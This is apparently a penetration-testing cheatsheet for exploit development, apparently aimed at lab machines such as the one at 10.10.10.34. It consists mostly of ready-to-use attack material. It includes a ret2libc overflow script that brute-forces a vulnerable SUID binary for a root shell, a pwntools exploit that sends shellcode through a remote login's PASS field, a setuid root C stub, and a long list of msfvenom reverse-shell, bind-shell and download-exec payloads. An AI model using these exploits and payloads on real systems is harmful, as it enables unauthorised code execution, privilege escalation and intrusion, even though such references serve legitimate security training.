Cheatsheet
Exploit Development
Print hex encoded string in text
printf $(cat file.txt | tr -d '\n')
Cross compile with - mingw32
i586-mingw32msvc-gcc a.c
wine a.exe
Passing binary data as arguments
command $(python -c 'print ...')
python -c 'print ...' | command
cat file - | command
python -c 'print ...' | cat file - | command
Printing shell code
(Bash) echo -e '\x31\xc0\x50\x68\x2f...'
(Python) python -c 'print "\x31\xc0\x50\x68\x2f..."'
(Perl) perl -e 'print "\x31\xc0\x50\x68\x2f..."'
ret2libc
- Find libc address:
ldd /usr/local/bin/backup
- Find libc
system
function: readelf -s /lib32/libc.so.6 | grep system
- Find libc
exit
function: readelf -s /lib32/libc.so.6 | grep exit
- Find libc
/bin/sh
reference: strings -a -t x /lib32/libc.so.6 | grep /bin/sh
import struct, subprocess
libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b
payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)
attempts = 0
while True:
attempts += 1
print "Attempts: " + attempts
subprocess.call(["/usr/local/bin/vulnerable-binary", "arg1", "arg2", payload])
Network attack
from pwn import *
shellcode =
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xc
d\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x7
3\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
payload = "A"*28 + p32(0xffffd630) + shellcode
r = remote('10.10.10.34', 7411)
print r.recv(1024)
r.sendline('USER admin')
print r.recv(1024)
r.sendline('PASS ' + payload)
r.interactive()
Simple SUID Binary
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
system("id");
return 0;
}
Msfvenum
Payloads
cmd/unix/bind_awk
cmd/unix/bind_busybox_telnetd
cmd/unix/bind_inetd
cmd/unix/bind_lua
cmd/unix/bind_netcat
cmd/unix/bind_netcat_gaping
cmd/unix/bind_netcat_gaping_ipv6
cmd/unix/bind_nodejs
cmd/unix/bind_perl
cmd/unix/bind_perl_ipv6
cmd/unix/bind_r
cmd/unix/bind_ruby
cmd/unix/bind_ruby_ipv6
cmd/unix/bind_socat_udp
cmd/unix/bind_stub
cmd/unix/bind_zsh
cmd/unix/generic
cmd/unix/reverse
cmd/unix/reverse_awk
cmd/unix/reverse_bash
cmd/unix/reverse_bash_telnet_ssl
cmd/unix/reverse_ksh
cmd/unix/reverse_lua
cmd/unix/reverse_ncat_ssl
cmd/unix/reverse_netcat
cmd/unix/reverse_netcat_gaping
cmd/unix/reverse_nodejs
cmd/unix/reverse_openssl
cmd/unix/reverse_perl
cmd/unix/reverse_perl_ssl
cmd/unix/reverse_php_ssl
cmd/unix/reverse_python
cmd/unix/reverse_python_ssl
cmd/unix/reverse_r
cmd/unix/reverse_ruby
cmd/unix/reverse_ruby_ssl
cmd/unix/reverse_socat_udp
cmd/unix/reverse_ssl_double_telnet
cmd/unix/reverse_stub
cmd/unix/reverse_zsh
cmd/windows/adduser
cmd/windows/generic
cmd/windows/powershell_bind_tcp
cmd/windows/powershell_reverse_tcp
cmd/windows/reverse_powershell
firefox/exec
firefox/shell_bind_tcp
firefox/shell_reverse_tcp
generic/shell_bind_tcp
generic/shell_reverse_tcp
java/shell/bind_tcp
java/shell/reverse_tcp
java/shell_reverse_tcp
linux/x64/exec
linux/x64/shell/bind_tcp
linux/x64/shell/reverse_tcp
linux/x64/shell_bind_tcp
linux/x64/shell_reverse_tcp
linux/x86/adduser
linux/x86/chmod
linux/x86/exec
linux/x86/shell/bind_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
multi/meterpreter/reverse_http
multi/meterpreter/reverse_https
nodejs/shell_bind_tcp
nodejs/shell_reverse_tcp
osx/armle/shell/bind_tcp
osx/armle/shell/reverse_tcp
osx/armle/shell_bind_tcp
osx/armle/shell_reverse_tcp
osx/ppc/shell/bind_tcp
osx/ppc/shell/reverse_tcp
osx/ppc/shell_bind_tcp
osx/ppc/shell_reverse_tcp
osx/x64/exec
osx/x64/shell_bind_tcp
osx/x64/shell_reverse_tcp
osx/x86/exec
osx/x86/shell_bind_tcp
osx/x86/shell_reverse_tcp
php/bind_php
php/download_exec
php/exec
php/reverse_perl
php/reverse_php
php/shell_findsock
python/shell_bind_tcp
python/shell_reverse_tcp
r/shell_bind_tcp
r/shell_reverse_tcp
ruby/shell_bind_tcp
ruby/shell_reverse_tcp
windows/adduser
windows/dllinject/bind_tcp
windows/dllinject/reverse_tcp
windows/download_exec
windows/exec
windows/powershell_bind_tcp
windows/powershell_reverse_tcp
windows/shell/bind_tcp
windows/shell/reverse_tcp
windows/shell_bind_tcp
windows/shell_reverse_tcp
windows/upexec/bind_tcp
windows/upexec/reverse_tcp
windows/x64/exec
windows/x64/powershell_bind_tcp
windows/x64/powershell_reverse_tcp
windows/x64/shell/bind_tcp
windows/x64/shell/reverse_tcp
windows/x64/shell_bind_tcp
windows/x64/shell_reverse_tcp